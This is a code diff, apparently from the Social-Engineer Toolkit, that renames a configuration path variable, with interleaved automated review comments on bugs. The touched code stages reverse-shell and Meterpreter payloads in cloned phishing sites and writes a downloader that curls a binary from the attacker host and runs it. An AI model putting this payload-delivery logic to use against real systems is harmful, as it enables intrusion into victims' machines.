@@ -114,20 +114,20 @@ if payload_selection == "SETSHELL": # replace ipaddress with one that we need for reverse connection back fileopen = open("src/payloads/set_payloads/downloader.windows", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") host = int(len(exe_name) + 1) * "X" webserver_count = int(len(webserver) + 1) * "S" ipaddr_count = int(len(ipaddr) + 1) * "M" filewrite.write(data.replace(str(host), exe_name + "\x00", 1)) filewrite.close() - fileopen = open(setdir + "/msf.exe", "rb") + fileopen = open(userconfigpath + "msf.exe", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1)) filewrite.close() - fileopen = open(setdir + "/msf.exe", "rb") + fileopen = open(userconfigpath + "msf.exe", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1)) filewrite.close() @@ -135,14 +135,14 @@ if payload_selection == "SETSHELL": if payload_selection == "RATTE": fileopen = open("src/payloads/ratte/ratte.binary", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") host = int(len(ipaddr) + 1) * "X" rPort = int(len(str(port)) + 1) * "Y" filewrite.write(data.replace(str(host), ipaddr + "\x00", 1)) filewrite.close() - fileopen = open(setdir + "/msf.exe", "rb") + fileopen = open(userconfigpath + "msf.exe", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1)) filewrite.close() 
@@ -152,22 +152,22 @@ if upx_encode == "ON" or upx_encode == "on": # core upx pass -if os.path.isfile(setdir + "/web_clone/msf.exe"): - os.remove(setdir + "/web_clone/msf.exe") -if os.path.isfile(setdir + "/msf.exe"): - shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe") +if os.path.isfile(userconfigpath + "web_clone/msf.exe"): + os.remove(userconfigpath + "web_clone/msf.exe") +if os.path.isfile(userconfigpath + "msf.exe"): + shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe") if payload_selection == "SETSHELL": - if os.path.isfile(setdir + "/web_clone/x"): - os.remove(setdir + "/web_clone/x") + if os.path.isfile(userconfigpath + "web_clone/x"): + os.remove(userconfigpath + "web_clone/x") shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % - (definepath), setdir + "/web_clone/x") + (definepath), userconfigpath + "web_clone/x") # if we are targetting nix if posix == True: print_info( "Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...") - filewrite = open(setdir + "/web_clone/mac.bin", "w") + filewrite = open(userconfigpath + "web_clone/mac.bin", "w") payload_flags = webserver.split(" ") # grab osx binary name osx_name = generate_random_string(10, 10) 
@@ -255,21 +255,21 @@ if posix == True: linux_name = generate_random_string(10, 10) downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2]) - filewrite = open(setdir + "/web_clone/nix.bin", "w") + filewrite = open(userconfigpath + "web_clone/nix.bin", "w") filewrite.write(downloader) filewrite.close() shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", - setdir + "/web_clone/%s" % (osx_name)) + userconfigpath + "web_clone/%s" % (osx_name)) shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", - setdir + "/web_clone/%s" % (linux_name)) + userconfigpath + "web_clone/%s" % (linux_name)) # copy over the downloader scripts osx_down = check_options("MAC.BIN=") lin_down = check_options("NIX.BIN=") - shutil.copyfile(setdir + "/web_clone/nix.bin", - setdir + "/web_clone/%s" % (lin_down)) - shutil.copyfile(setdir + "/web_clone/mac.bin", - setdir + "/web_clone/%s" % (osx_down)) + shutil.copyfile(userconfigpath + "web_clone/nix.bin", + userconfigpath + "web_clone/%s" % (lin_down)) + shutil.copyfile(userconfigpath + "web_clone/mac.bin", + userconfigpath + "web_clone/%s" % (osx_down)) # check to see if we are using a staged approach or direct shell stager = check_config("SET_SHELL_STAGER=").lower() 
@@ -277,11 +277,11 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP": # only trigger if we are using the SETSHELL if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP": # ensure that index.html is really there - if os.path.isfile(setdir + "/web_clone/index.html"): + if os.path.isfile(userconfigpath + "web_clone/index.html"): print_status( "Stager turned off, prepping direct download payload...") - fileopen = open(setdir + "/web_clone/index.html", "r") - filewrite = open(setdir + "/web_clone/index.html.3", "w") + fileopen = open(userconfigpath + "web_clone/index.html", "r") + filewrite = open(userconfigpath + "web_clone/index.html.3", "w") data = fileopen.read() # replace freehugs with ip and port data = data.replace("freehugs", reverse_connection) 
@@ -293,22 +293,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP": # be newer if payload_selection == "SETSHELL": try: - if os.path.isfile(setdir + "/web_clone/index.html"): - os.remove(setdir + "/web_clone/index.html") - shutil.copyfile(setdir + "/web_clone/index.html.3", - setdir + "/web_clone/index.html") - if os.path.isfile(setdir + "/web_clone/index.html.3"): - os.remove(setdir + "/web_clone/index.html.3") - if os.path.isfile(setdir + "/web_clone/msf.exe"): - os.remove(setdir + "/web_clone/msf.exe") - shutil.copyfile(setdir + "/web_clone/x", - setdir + "/web_clone/msf.exe") + if os.path.isfile(userconfigpath + "web_clone/index.html"): + os.remove(userconfigpath + "web_clone/index.html") + shutil.copyfile(userconfigpath + "web_clone/index.html.3", + userconfigpath + "web_clone/index.html") + if os.path.isfile(userconfigpath + "web_clone/index.html.3"): + os.remove(userconfigpath + "web_clone/index.html.3") + if os.path.isfile(userconfigpath + "web_clone/msf.exe"): + os.remove(userconfigpath + "web_clone/msf.exe") + shutil.copyfile(userconfigpath + "web_clone/x", + userconfigpath + "web_clone/msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") - if os.path.isfile(setdir + "/msf.exe"): - os.remove(setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") + if os.path.isfile(userconfigpath + "msf.exe"): + os.remove(userconfigpath + "msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") # catch errors, will convert to log later except Exception as error: 
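Review bot: In the `payload_selection == "SETSHELL"` branch the first `shutil.copyfile(userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")` is immediately undone by the `os.path.isfile(...)`/`os.remove(...)` pair and then repeated, so the first copy is dead work; a single `shutil.copyfile` after the remove is enough. The `SETSHELL_HTTP` branch in the next hunk (@@ -317) carries the same copy/remove/copy sequence and is otherwise a near line-for-line duplicate of this one, so a small helper taking the source binary would let both branches share the remove-and-copy logic. Both blocks end in a broad `except Exception as error:` whose body lies outside the hunk, so which failures are swallowed cannot be judged here.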
@@ -317,22 +317,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP": # if we are using the HTTP reverse shell then lets use this if payload_selection == "SETSHELL_HTTP": try: - if os.path.isfile(setdir + "/web_clone/index.html"): - os.remove(setdir + "/web_clone/index.html") - shutil.copyfile(setdir + "/web_clone/index.html.3", - setdir + "/web_clone/index.html") - if os.path.isfile(setdir + "/web_clone/index.html.3"): - os.remove(setdir + "/web_clone/index.html.3") - if os.path.isfile(setdir + "/web_clone/msf.exe"): - os.remove(setdir + "/web_clone/msf.exe") + if os.path.isfile(userconfigpath + "web_clone/index.html"): + os.remove(userconfigpath + "web_clone/index.html") + shutil.copyfile(userconfigpath + "web_clone/index.html.3", + userconfigpath + "web_clone/index.html") + if os.path.isfile(userconfigpath + "web_clone/index.html.3"): + os.remove(userconfigpath + "web_clone/index.html.3") + if os.path.isfile(userconfigpath + "web_clone/msf.exe"): + os.remove(userconfigpath + "web_clone/msf.exe") shutil.copyfile( - "src/payloads/set_payloads/http_shell.binary", setdir + "/web_clone/msf.exe") + "src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") - if os.path.isfile(setdir + "/msf.exe"): - os.remove(setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") + if os.path.isfile(userconfigpath + "msf.exe"): + os.remove(userconfigpath + "msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") # catch errors, will convert to log later except Exception as error: diff --git a/src/core/set.py b/src/core/set.py index e44658712..cac6ec745 100644 --- a/src/core/set.py +++ b/src/core/set.py 
@@ -205,7 +205,7 @@ try: try: # write our attack vector to file to be called later - filewrite = open(setdir + "/attack_vector", "w") + filewrite = open(userconfigpath + "attack_vector", "w") # webjacking and web templates are not allowed if attack_vector == "5" and choice3 == "1": @@ -329,7 +329,7 @@ try: ["2"], "IP address to SET web server (this could be your external IP or hostname)")) filewrite2 = open( - setdir + "/interface", "w") + userconfigpath + "interface", "w") filewrite2.write( ipquestion) filewrite2.close() @@ -407,8 +407,8 @@ try: sys.path.append(definepath + "/src/html/") # clean up stale file - if os.path.isfile(setdir + "/cloner.failed"): - os.remove(setdir + "/cloner.failed") + if os.path.isfile(userconfigpath + "cloner.failed"): + os.remove(userconfigpath + "cloner.failed") site_cloned = True @@ -429,7 +429,7 @@ try: except: import src.core.payloadgen.create_payloads - if os.path.isfile(setdir + "/cloner.failed"): + if os.path.isfile(userconfigpath + "cloner.failed"): site_cloned = False if site_cloned == True: @@ -506,9 +506,9 @@ try: definepath = os.getcwd() sys.path.append( definepath + "/src/webattack/web_clone/") - if os.path.isfile(setdir + "/site.template"): - os.remove(setdir + "/site.template") - filewrite = open(setdir + "/site.template", "w") + if os.path.isfile(userconfigpath + "site.template"): + os.remove(userconfigpath + "site.template") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("TEMPLATE=CUSTOM") print_info("SET supports both HTTP and HTTPS") # specify the site to clone @@ -574,7 +574,7 @@ try: except: import src.webattack.web_clone.cloner - if os.path.isfile(setdir + "/cloner.failed"): + if os.path.isfile(userconfigpath + "cloner.failed"): site_cloned = False if site_cloned == True: 
@@ -652,13 +652,13 @@ try: sys.path.append( definepath + "/src/webattack/web_clone/") - if os.path.isfile(setdir + "/site.template"): - os.remove(setdir + "/site.template") - filewrite = open(setdir + "/site.template", "w") + if os.path.isfile(userconfigpath + "site.template"): + os.remove(userconfigpath + "site.template") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("TEMPLATE=SELF") # specify the site to clone - if not os.path.isdir(setdir + "/web_clone"): - os.makedirs(setdir + "/web_clone") + if not os.path.isdir(userconfigpath + "web_clone"): + os.makedirs(userconfigpath + "web_clone") print_warning( "Example: /home/website/ (make sure you end with /)") print_warning( @@ -671,11 +671,11 @@ try: if not os.path.isfile(URL + "index.html"): if os.path.isfile(URL): shutil.copyfile( - "%s" % (URL), setdir + "/web_clone/index.html") + "%s" % (URL), userconfigpath + "web_clone/index.html") if not os.path.isfile(URL): if URL.endswith("index.html"): shutil.copyfile( - URL, "%s/web_clone/index.html" % (setdir)) + URL, "%s/web_clone/index.html" % (userconfigpath)) else: print_error("ERROR:index.html not found!!") print_error( @@ -690,11 +690,11 @@ try: choice = raw_input( "\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ") if choice == "1" or choice == "": - if os.path.isfile("%s/web_clone/index.html" % (setdir)): + if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): os.remove( - "%s/web_clone/index.html" % (setdir)) + "%s/web_clone/index.html" % (userconfigpath)) shutil.copyfile( - URL + "index.html", "%s/web_clone/" % (setdir)) + URL + "index.html", "%s/web_clone/" % (userconfigpath)) if choice == "2": if os.path.isdir(URL + "src/webattack"): print_error( @@ -705,7 +705,7 @@ try: print_error( "You tried the same thing. Exiting now.") sys.exit() - copyfolder(URL, "%s/web_clone/" % setdir) + copyfolder(URL, "%s/web_clone/" % userconfigpath) filewrite.write("\nURL=%s" % (URL)) filewrite.close() 
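Review bot: `shutil.copyfile(URL + "index.html", "%s/web_clone/" % (userconfigpath))` in the `choice == "1"` branch of @@ -690 passes a directory as the destination, which shutil.copyfile rejects with an error instead of placing the file inside it; the target should be the file path, `shutil.copyfile(URL + "index.html", os.path.join(userconfigpath, "web_clone", "index.html"))`. The same hunk and @@ -671 mix `"%s/web_clone/index.html" % (userconfigpath)` with `userconfigpath + "web_clone/index.html"`, so one of the two forms yields a doubled separator whenever the other is exact; os.path.join() makes both unnecessary. The enclosing try block begins before these hunks.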
@@ -782,7 +782,7 @@ try: if not match: if not match1: URL = ("http://" + URL) - filewrite = open(setdir + "/site.template", "w") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("\nURL=%s" % (URL)) filewrite.close() @@ -807,7 +807,7 @@ try: if not match: if not match1: URL = ("http://" + URL) - filewrite = open(setdir + "/site.template", "w") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("\nURL=%s" % (URL)) filewrite.close() # start tabnabbing here @@ -879,13 +879,13 @@ try: setprompt(["3"], "IP address for the reverse connection (payload)")) update_options("IPADDR=" + ipaddr) - filewrite1 = open(setdir + "/payloadgen", "w") + filewrite1 = open(userconfigpath + "payloadgen", "w") filewrite1.write("payloadgen=solo") filewrite1.close() # if choice is file-format if infectious_menu_choice == "1": - filewrite = open(setdir + "/fileformat.file", "w") + filewrite = open(userconfigpath + "fileformat.file", "w") filewrite.write("fileformat=on") filewrite.close() sys.path.append(definepath + "/src/core/msf_attacks/") @@ -923,8 +923,8 @@ try: # try: import src.core.payloadgen.solo # except: module_reload(src.core.payloadgen.solo) # if the set payload is there - if os.path.isfile(setdir + "/msf.exe"): - shutil.copyfile(setdir + "/msf.exe", "payload.exe") + if os.path.isfile(userconfigpath + "msf.exe"): + shutil.copyfile(userconfigpath + "msf.exe", "payload.exe") return_continue() # Main Menu choice 5: Mass Mailer Attack 
@@ -953,7 +953,7 @@ try: if teensy_menu_choice != "99": # set our teensy info file in program junk - filewrite = open(setdir + "/teensy", "w") + filewrite = open(userconfigpath + "teensy", "w") filewrite.write(teensy_menu_choice + "\n") if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14": yes_or_no = yesno_prompt( @@ -972,10 +972,10 @@ try: if yes_or_no == "NO": filewrite.close() # need these default files for web server load - filewrite = open(setdir + "/site.template", "w") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("TEMPLATE=CUSTOM") filewrite.close() - filewrite = open(setdir + "/attack_vector", "w") + filewrite = open(userconfigpath + "attack_vector", "w") filewrite.write("hid") filewrite.close() # if we are doing binary2teensy @@ -998,10 +998,10 @@ try: if teensy_menu_choice == "9": print_status( "Generating the SD2Teensy OSX ino file for you...") - if not os.path.isdir(setdir + "/reports/osx_sd2teensy"): - os.makedirs(setdir + "/reports/osx_sd2teensy") + if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"): + os.makedirs(userconfigpath + "reports/osx_sd2teensy") shutil.copyfile("src/teensy/osx_sd2teensy.ino", - "%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (setdir)) + "%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath)) print_status( "File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino") return_continue() 
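Review bot: The `teensy_menu_choice == "9"` hunk (@@ -998) creates the directory with `userconfigpath + "reports/osx_sd2teensy"` but copies into `"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath)`, so two adjacent lines encode opposite assumptions about whether userconfigpath ends in a separator; the @@ -1164 hunk keeps the `"%s/reports" % (userconfigpath)` form as well. `os.path.join(userconfigpath, "reports", "osx_sd2teensy", "osx_sd2teensy.ino")` works for either convention and matches the commit's stated intent. The `print_status` message hard-codes `~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino`, which will be wrong if userconfigpath is ever relocated; printing the computed path keeps the message truthful.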
@@ -1010,12 +1010,12 @@ try: if teensy_menu_choice == "10": print_status( "Generating the Arduino sniffer and libraries ino..") - if not os.path.isdir(setdir + "/reports/arduino_sniffer"): - os.makedirs(setdir + "/reports/arduino_sniffer") + if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"): + os.makedirs(userconfigpath + "reports/arduino_sniffer") shutil.copyfile("src/teensy/x10/x10_sniffer.ino", - setdir + "/reports/arduino_sniffer/x10_sniffer.ino") + userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino") shutil.copyfile("src/teensy/x10/libraries.zip", - setdir + "/reports/arduino_sniffer/libraries.zip") + userconfigpath + "reports/arduino_sniffer/libraries.zip") print_status( "Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer") return_continue() @@ -1024,12 +1024,12 @@ try: if teensy_menu_choice == "11": print_status( "Generating the Arduino jammer ino and libraries...") - if not os.path.isdir(setdir + "/reports/arduino_jammer"): - os.makedirs(setdir + "/reports/arduino_jammer") + if not os.path.isdir(userconfigpath + "reports/arduino_jammer"): + os.makedirs(userconfigpath + "reports/arduino_jammer") shutil.copyfile("src/teensy/x10/x10_blackout.ino", - setdir + "/reports/arduino_jammer/x10_blackout.ino") + userconfigpath + "reports/arduino_jammer/x10_blackout.ino") shutil.copyfile("src/teensy/x10/libraries.zip", - setdir + "/reports/arduino_jammer/libraries.zip") + userconfigpath + "reports/arduino_jammer/libraries.zip") print_status( "Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer") return_continue() 
@@ -1164,8 +1164,8 @@ and send the QRCode via a mailer. "Enter the URL you want the QRCode to go to (99 to exit): ") if url != "99": # if the reports directory does not exist then create it - if not os.path.isdir("%s/reports" % (setdir)): - os.makedirs("%s/reports" % (setdir)) + if not os.path.isdir("%s/reports" % (userconfigpath)): + os.makedirs("%s/reports" % (userconfigpath)) gen_qrcode(url) return_continue() diff --git a/src/core/setcore.py b/src/core/setcore.py index c54a976d2..bac58331d 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -2025,7 +2025,7 @@ def input(string): def fetch_template(): - fileopen = open(setdir + "/site.template").readlines() + fileopen = open(userconfigpath + "site.template").readlines() for line in fileopen: line = line.rstrip() match = re.search("URL=", line) diff --git a/src/core/ssl/setssl.py b/src/core/ssl/setssl.py index fdae850de..1fb5c18bb 100644 --- a/src/core/ssl/setssl.py +++ b/src/core/ssl/setssl.py @@ -8,7 +8,7 @@ from src.core.setcore import * import subprocess import os definepath = os.getcwd() -os.chdir(setdir) +os.chdir(userconfigpath) # create the directories for us subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait() # move into CA directory diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index a046fe693..476c68945 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -240,7 +240,7 @@ def deploy_hex2binary(ipaddr, port, username, password): core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - #with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite: + #with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite = file(core.userconfigpath + "payload_options.shellcode", "w") filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) 
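Review bot: `os.chdir(userconfigpath)` runs at module level in src/core/ssl/setssl.py, so importing the module changes the working directory of the whole process, and the tree is then built through `subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True)`. `os.makedirs(os.path.join(userconfigpath, "CA", "newcerts"))` and `os.makedirs(os.path.join(userconfigpath, "CA", "private"))`, guarded with `os.path.isdir` as the set.py hunks do, create the same directories without a shell and without depending on the cwd. If the steps after the `# move into CA directory` comment rely on the cwd, the chdir may still be needed, but the mkdir does not; the rest of the module is outside the hunk.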
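Review bot: In src/fasttrack/mssql.py the hunk corrects only the commented-out `#with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:` line, while the live statement two lines below, `filewrite = file(core.userconfigpath + "payload_options.shellcode", "w")`, is left as is; `file()` is a Python 2-only builtin and the handle is not closed in the visible lines. The psexec.py hunk in this same commit already uses the `with open(os.path.join(...))` form for the identical write, so replacing the `file(...)` line with the commented `with` statement (and indenting the `filewrite.write(...)` under it) makes the two sites consistent. The remainder of deploy_hex2binary lies outside the hunk.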
diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index d0049c3d4..616e7df17 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -68,7 +68,7 @@ try: if port == "": port = "443" core.update_options("PORT={0}".format(port)) - with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite: + with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") diff --git a/src/html/spawn.py b/src/html/spawn.py index 747c9c77d..8a64aff66 100644 --- a/src/html/spawn.py +++ b/src/html/spawn.py @@ -29,8 +29,8 @@ if check_options("CUSTOM_EXE="): custom = 1 if not "CMD/MULTI" in check_options("CUSTOM_EXE="): # here we need to modify the java applet to recognize custom attribute - fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") + fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # we randomize param name so static sigs cant be used @@ -39,7 +39,7 @@ if check_options("CUSTOM_EXE="): 'param name="8" value="%s"' % (goat_random)) filewrite.write(data) filewrite.close() - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), shell=True).wait() + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait() print_status("Note that since you are using a custom payload, you will need to create your OWN listener.") print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.") 
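Review bot: `subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait()` in the spawn.py @@ -39 hunk still interpolates the config path into an unquoted shell command, so a space or shell metacharacter in that path breaks the rename or changes what the shell runs, and the move needs no shell at all. `shutil.move(os.path.join(userconfigpath, "web_clone", "index.html.new"), os.path.join(userconfigpath, "web_clone", "index.html"))` does the same job without it, assuming shutil is imported in spawn.py (not visible here). The `"%s/web_clone/index.html" % (userconfigpath)` open() calls in @@ -29 keep the slash form, unlike the `userconfigpath + "set.payload"` form used in @@ -68; os.path.join would unify them.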
@@ -68,8 +68,8 @@ msf_path = "" # see if we are using setshell set_payload = "" -if os.path.isfile(setdir + "/set.payload"): - fileopen = open(setdir + "/set.payload", "r") +if os.path.isfile(userconfigpath + "set.payload"): + fileopen = open(userconfigpath + "set.payload", "r") for line in fileopen: set_payload = line.rstrip() @@ -97,8 +97,8 @@ def web_server_start(): web_port = check_config("WEB_PORT=") # see if exploit requires webdav - if os.path.isfile(setdir + "/meta_config"): - fileopen = open(setdir + "/meta_config", "r") + if os.path.isfile(userconfigpath + "meta_config"): + fileopen = open(userconfigpath + "meta_config", "r") for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) @@ -114,8 +114,8 @@ def web_server_start(): ipaddr = input("Enter your ipaddress: ") # Grab custom or set defined - if os.path.isfile(setdir + "/site.template"): - fileopen = open(setdir + "/site.template", "r").readlines() + if os.path.isfile(userconfigpath + "site.template"): + fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("TEMPLATE=", line) @@ -124,13 +124,13 @@ def web_server_start(): template = line[1] # grab web attack selection - if os.path.isfile(setdir + "/attack_vector"): - fileopen = open(setdir + "/attack_vector", "r").readlines() + if os.path.isfile(userconfigpath + "attack_vector"): + fileopen = open(userconfigpath + "attack_vector", "r").readlines() for line in fileopen: attack_vector = line.rstrip() # if it doesn't exist just set a default template - if not os.path.isfile(setdir + "/attack_vector"): + if not os.path.isfile(userconfigpath + "attack_vector"): attack_vector = "nada" # Sticking it to A/V below 
@@ -145,14 +145,14 @@ def web_server_start(): # check multiattack flags here multiattack_harv = "off" - if os.path.isfile(setdir + "/multi_harvester"): + if os.path.isfile(userconfigpath + "multi_harvester"): multiattack_harv = "on" - if os.path.isfile(setdir + "/multi_tabnabbing"): + if os.path.isfile(userconfigpath + "multi_tabnabbing"): multiattack_harv = "on" # open our config file that was specified in SET - if os.path.isfile(setdir + "/site.template"): - fileopen = open(setdir + "/site.template", "r").readlines() + if os.path.isfile(userconfigpath + "site.template"): + fileopen = open(userconfigpath + "site.template", "r").readlines() # start loop here for line in fileopen: line = line.rstrip() @@ -164,7 +164,7 @@ def web_server_start(): url = line[1].rstrip() # if we didn't create template then do self - if not os.path.isfile(setdir + "/site.template"): + if not os.path.isfile(userconfigpath + "site.template"): template = "SELF" # If SET is setting up the website for you, get the website ready for 
@@ -224,38 +224,38 @@ def web_server_start(): if attack_vector != 'hijacking': print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC) # copy all the files needed - if not os.path.isfile(setdir + "/" + applet_name): + if not os.path.isfile(userconfigpath + "" + applet_name): shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % - (definepath), "%s/%s" % (setdir, applet_name)) - shutil.copyfile(setdir + "/%s" % (applet_name), - "%s/web_clone/%s" % (setdir, applet_name)) + (definepath), "%s/%s" % (userconfigpath, applet_name)) + shutil.copyfile(userconfigpath + "%s" % (applet_name), + "%s/web_clone/%s" % (userconfigpath, applet_name)) if os.path.isfile("%s/src/html/nix.bin" % (definepath)): nix = check_options("NIX.BIN=") shutil.copyfile("%s/src/html/nix.bin" % - (definepath), "%s/web_clone/%s" % (setdir, nix)) + (definepath), "%s/web_clone/%s" % (userconfigpath, nix)) if os.path.isfile("%s/src/html/mac.bin" % (definepath)): mac = check_options("MAC.BIN=") shutil.copyfile("%s/src/html/mac.bin" % (definepath), - "%s/web_clone/%s" % (setdir, definepath, mac)) - if os.path.isfile(setdir + "/msf.exe"): + "%s/web_clone/%s" % (userconfigpath, definepath, mac)) + if os.path.isfile(userconfigpath + "msf.exe"): win = check_options("MSF.EXE=") - shutil.copyfile(setdir + "/msf.exe", - "%s/web_clone/%s" % (setdir, win)) + shutil.copyfile(userconfigpath + "msf.exe", + "%s/web_clone/%s" % (userconfigpath, win)) # pull random name generation print_status( "The site has been moved. SET Web Server is now listening..") rand_gen = check_options("MSF_EXE=") if rand_gen != 0: - if os.path.isfile(setdir + "/custom.exe"): - shutil.copyfile(setdir + "/msf.exe", - setdir + "/web_clone/msf.exe") + if os.path.isfile(userconfigpath + "custom.exe"): + shutil.copyfile(userconfigpath + "msf.exe", + userconfigpath + "web_clone/msf.exe") print("\n[*] Website has been cloned and custom payload imported. 
Have someone browse your site now") - shutil.copyfile(setdir + "/web_clone/msf.exe", - setdir + "/web_clone/%s" % (rand_gen)) + shutil.copyfile(userconfigpath + "web_clone/msf.exe", + userconfigpath + "web_clone/%s" % (rand_gen)) # if docbase exploit do some funky stuff to get it to work right - if os.path.isfile(setdir + "/docbase.file"): + if os.path.isfile(userconfigpath + "docbase.file"): docbase = (r""" @@ -267,11 +267,11 @@ def web_server_start(): """ % (ipaddr)) - if os.path.isfile(setdir + "/web_clone/site.html"): - os.remove(setdir + "/web_clone/site.html") - shutil.copyfile(setdir + "/web_clone/index.html", - setdir + "/web_clone/site.html") - filewrite = open(setdir + "/web_clone/index.html", "w") + if os.path.isfile(userconfigpath + "web_clone/site.html"): + os.remove(userconfigpath + "web_clone/site.html") + shutil.copyfile(userconfigpath + "web_clone/index.html", + userconfigpath + "web_clone/site.html") + filewrite = open(userconfigpath + "web_clone/index.html", "w") filewrite.write(docbase) filewrite.close() @@ -288,7 +288,7 @@ def web_server_start(): import src.core.webserver as webserver # specify the path for the SET web directories for the applet # attack - path = (setdir + "/web_clone/") + path = (userconfigpath + "web_clone/") try: import multiprocessing p = multiprocessing.Process( @@ -320,7 +320,7 @@ def web_server_start(): import src.core.webserver as webserver # specify the path for the SET web directories for the # applet attack - path = (setdir + "/web_clone/") + path = (userconfigpath + "web_clone/") p = multiprocessing.Process( target=webserver.start_server, args=(web_port, path)) p.start() 
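Review bot: `"%s/web_clone/%s" % (userconfigpath, definepath, mac)` in the `mac.bin` branch of @@ -224 supplies three values to a format string with two placeholders, which raises TypeError ("not all arguments converted during string formatting") whenever src/html/mac.bin exists; the commit touched this line but kept the stray `definepath`. The intended form, matching the `nix` branch just above it, is `"%s/web_clone/%s" % (userconfigpath, mac)`. `os.path.isfile(userconfigpath + "" + applet_name)` earlier in the hunk carries an empty-string leftover from the slash removal that should be dropped. This hunk begins on the previous source line and web_server_start continues past it.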
